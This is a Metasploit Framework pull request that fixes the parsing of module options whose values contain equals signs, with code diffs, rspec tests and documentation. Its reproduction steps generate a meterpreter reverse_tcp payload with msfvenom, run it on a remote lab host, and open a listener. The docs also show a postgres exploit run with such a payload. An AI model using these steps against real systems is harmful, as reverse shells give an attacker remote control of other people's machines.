### PR TITLE
Fix parsing of module options with special characters

### DIFF
--- a/docs/metasploit-framework.wiki/Metasploit-Guide-Setting-Module-Options.md
+++ b/docs/metasploit-framework.wiki/Metasploit-Guide-Setting-Module-Options.md
@@ -102,6 +102,18 @@ use exploit/linux/postgres/postgres_payload
 run postgres://postgres:password@192.168.123.6 lhost=192.168.123.1 lport=5000 payload=linux/x64/meterpreter/reverse_tcp target='Linux\ x86_64' verbose=true
 ```
 
+You can set complex options using quotes. Example:
+
+```
+set COMMAND "date --date='TZ=\"America/Los_Angeles\" 09:00 next Fri' --iso-8601=ns"
+```
+
+Or the same command using single quotes and setting the option inline:
+
+```
+run COMMAND='date --date='\''TZ="America/Los_Angeles" 09:00 next Fri'\'' --iso-8601=ns'
+```
+
 ### URI support for RHOSTS
 
 Metasploit also supports the use of [URI](https://en.wikipedia.org/wiki/Uniform_Resource_Identifier) strings as arguments,

--- a/lib/msf/core/data_store.rb
+++ b/lib/msf/core/data_store.rb
@@ -122,7 +122,7 @@ class DataStore < Hash
 
     # Split on the delimeter
     option_str.split(delim).each { |opt|
-      var, val = opt.split('=')
+      var, val = opt.split('=', 2)
 
       next if (var =~ /^\s+$/)
 

--- a/lib/msf/core/data_store_with_fallbacks.rb
+++ b/lib/msf/core/data_store_with_fallbacks.rb
@@ -168,7 +168,7 @@ class DataStoreWithFallbacks
 
     # Split on the delimeter
     option_str.split(delim).each { |opt|
-      var, val = opt.split('=')
+      var, val = opt.split('=', 2)
 
       next if (var =~ /^\s+$/)
 

--- a/lib/msf/ui/console/command_dispatcher/post.rb
+++ b/lib/msf/ui/console/command_dispatcher/post.rb
@@ -77,7 +77,7 @@ class Post
     begin
       mod.run_simple(
         'Action'         => args[:action],
-        'OptionStr'      => args[:datastore_options].map { |k,v| "#{k}=#{v}" }.join(','),
+        'Options'      => args[:datastore_options],
         'LocalInput'     => driver.input,
         'LocalOutput'    => driver.output,
         'RunAsJob'       => jobify,

--- a/spec/lib/msf/core/data_store_spec.rb
+++ b/spec/lib/msf/core/data_store_spec.rb
@@ -61,6 +61,28 @@ RSpec.describe Msf::DataStore do
       s
     end
     it_behaves_like "datastore"
+
+    context "parsing corner cases" do
+      it "should parse comma separated strings" do
+        str = "foo=bar,fizz=buzz"
+        subject.import_options_from_s(str)
+
+        expect(subject).to have_key("foo")
+        expect(subject["foo"]).to eql("bar")
+        expect(subject).to have_key("fizz")
+        expect(subject["fizz"]).to eql("buzz")
+      end
+
+      it "should parse options with nested equals" do
+        str = "COMMAND=date --date=2023-01-01 --iso-8601=ns,SESSION=1"
+        subject.import_options_from_s(str)
+
+        expect(subject).to have_key("COMMAND")
+        expect(subject["COMMAND"]).to eql("date --date=2023-01-01 --iso-8601=ns")
+        expect(subject).to have_key("SESSION")
+        expect(subject["SESSION"]).to eql("1")
+      end
+    end
   end
 
   describe "#from_file" do

--- a/spec/lib/msf/core/data_store_with_fallbacks_spec.rb
+++ b/spec/lib/msf/core/data_store_with_fallbacks_spec.rb
@@ -195,6 +195,28 @@ RSpec.shared_examples_for 'a datastore' do
       s
     end
     it_behaves_like 'a datastore with lookup support'
+
+    context "parsing corner cases" do
+      it "should parse comma separated strings" do
+        str = "foo=bar,fizz=buzz"
+        subject.import_options_from_s(str)
+
+        expect(subject).to have_key("foo")
+        expect(subject["foo"]).to eql("bar")
+        expect(subject).to have_key("fizz")
+        expect(subject["fizz"]).to eql("buzz")
+      end
+
+      it "should parse options with nested equals" do
+        str = "COMMAND=date --date=2023-01-01 --iso-8601=ns,SESSION=1"
+        subject.import_options_from_s(str)
+
+        expect(subject).to have_key("COMMAND")
+        expect(subject["COMMAND"]).to eql("date --date=2023-01-01 --iso-8601=ns")
+        expect(subject).to have_key("SESSION")
+        expect(subject["SESSION"]).to eql("1")
+      end
+    end
   end
 
   describe '#from_file' do


### PR DESCRIPTION
Fixes bug #16578 and other related (non-reported) bugs found in the way. Following is the list of issues found:

# 1. Issue parsing COMMAND option that contains nested equals sign ‘=’ in meterpreter shell

### Steps to reproduce

Create payload and copy payload into remote Linux host:
```bash
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<your local ip addr> LPORT=4444 -f elf -o payload
```

Open listener in local host:
```
msf6> use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD payload/linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <your local ip addr>
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > set ExitOnSession false
msf6 exploit(multi/handler) > exploit -j
```

Execute payload in remote host:
```bash
$ chmod +x payload
$ ./payload
```

Attach to meterpreter session in local host:
```
msf6 exploit(multi/handler) > sessions -i <session id>
```

Run command in remote host inside meterpreter shell:
<pre>
meterpreter> run post/multi/general/execute COMMAND='<b>date --date=2023-01-01 --iso-8601=ns</b>'
</pre>

### Output

**Verify** command is not executed with expected flags, the command's flag is trimmed after the equals sign ‘=’:
<pre>
[*] Executing <b>date --date</b> on Session:meterpreter 172.26.224.1:58704 (172.26.224.1) "msfadmin @ metasploitable.localdomain"...
[*] Response: date: option `--date' requires an argument
Try `date --help' for more information.
</pre>

### Expected output

**Verify** that command executes with expected arguments:
<pre>
[*] Executing <b>date --date=2023-01-01 --iso-8601=ns</b> on Session:meterpreter 172.26.224.1:54210 (172.26.224.1) "msfadmin @ metasploitable.localdomain"...
[*] Response: 2023-01-01T00:00:00,000000000-0500
</pre>

### Additional information

This same bug exists in file: `lib/msf/core/data_store_with_fallbacks.rb`. To test it enable the feature datastore_fallbacks:
```
msf6> features set datastore_fallbacks true
```
Restart framework and follow steps above.

### Fixes
- [fix: parse COMMAND with nested '=' in meterpreter](https://github.com/rapid7/metasploit-framework/commit/6074d1a4d36cceebd5a44575b31031b2afcb0b44)
- [test: added rspec tests for 6074d1a](https://github.com/rapid7/metasploit-framework/pull/17444/commits/03acb7e9f21a530111be5d10fbaa0d38c0e31858)

# 2. Issues parsing commands when using a module directly

### Steps to reproduce

Set up session as explained above, but this time don’t enter into a meterpreter shell.

```
msf6> use post/multi/general/execute
msf6 post(multi/general/execute) > set SESSION <your session id>
```

Now, all these variations cause problems:

- <pre>msf6 post(multi/general/execute) > run COMMAND='<b>date --date=2023-01-01</b>'</pre>

Output, **verify** that the command executed is only `date` without flags:
<pre>
[*] Executing <b>date</b> on Session:meterpreter 172.26.224.1:50405 (172.26.224.1) "msfadmin @ metasploitable.localdomain"...
[*] Response: Wed Jan  4 06:34:46 EST 2023
[*] Post module execution completed
</pre>

- <pre>msf6 post(multi/general/execute) > run COMMAND='<b>date -d 2023-01-01 --iso-8601=ns</b>'</pre>

Output, **verify** that the command is not even executed:
<pre>
[-] Post failed: Rex::ArgumentParseError The argument could not be parsed correctly.
[-] Call stack:
[-]   /home/htobonm/workspace/metasploit-framework/lib/msf/core/data_store.rb:124:in `each'
[-]   /home/htobonm/workspace/metasploit-framework/lib/msf/core/data_store.rb:124:in `import_options_from_s'
</pre>

### Expected output

Something similar to:
```
[*] Executing date -d 2023-01-01 -Ins on #<Session:meterpreter 172.26.224.1:50405 (172.26.224.1) "msfadmin @ metasploitable.localdomain">...
[*] Response: 2023-01-01T00:00:00,000000000-0500
[*] Post module execution completed
```

### Additional information

- When running the same command with the alias flags that don’t include equals sign ‘=’, it works. For example:

<pre>
msf6 post(multi/general/execute) > run COMMAND="<b>date -d 2023-01-01 -Ins</b>"
</pre>

Output:
<pre>
[*] Executing <b>date -d 2023-01-01 -Ins</b> on Session:meterpreter 172.26.224.1:50405 (172.26.224.1) "msfadmin @ metasploitable.localdomain"...
[*] Response: 2023-01-01T00:00:00,000000000-0500
[*] Post module execution completed
</pre>

- When setting the COMMAND option before running the module, it works **most of the time** (as shown above with the unmatched quote issue). For example:

<pre>
msf6 post(multi/general/execute) > <b>set COMMAND 'date --date=2023-01-01 --iso-8601=ns'</b>
msf6 post(multi/general/execute) > run
</pre>

Output, **verify** that run is executed without inline options, and works:

<pre>
[*] Executing <b>date --date=2023-01-01 --iso-8601=ns</b> on Session:meterpreter 172.26.224.1:50405 (172.26.224.1) "msfadmin @ metasploitable.localdomain"...
[*] Response: 2023-01-01T00:00:00,000000000-0500
[*] Post module execution completed
</pre>

### Fixes

- [fix: cmd_run: remove unnecessary map](https://github.com/rapid7/metasploit-framework/pull/17444/commits/fd7fbb76af8e6105ebfa5f85e11fc83c03b1c530)


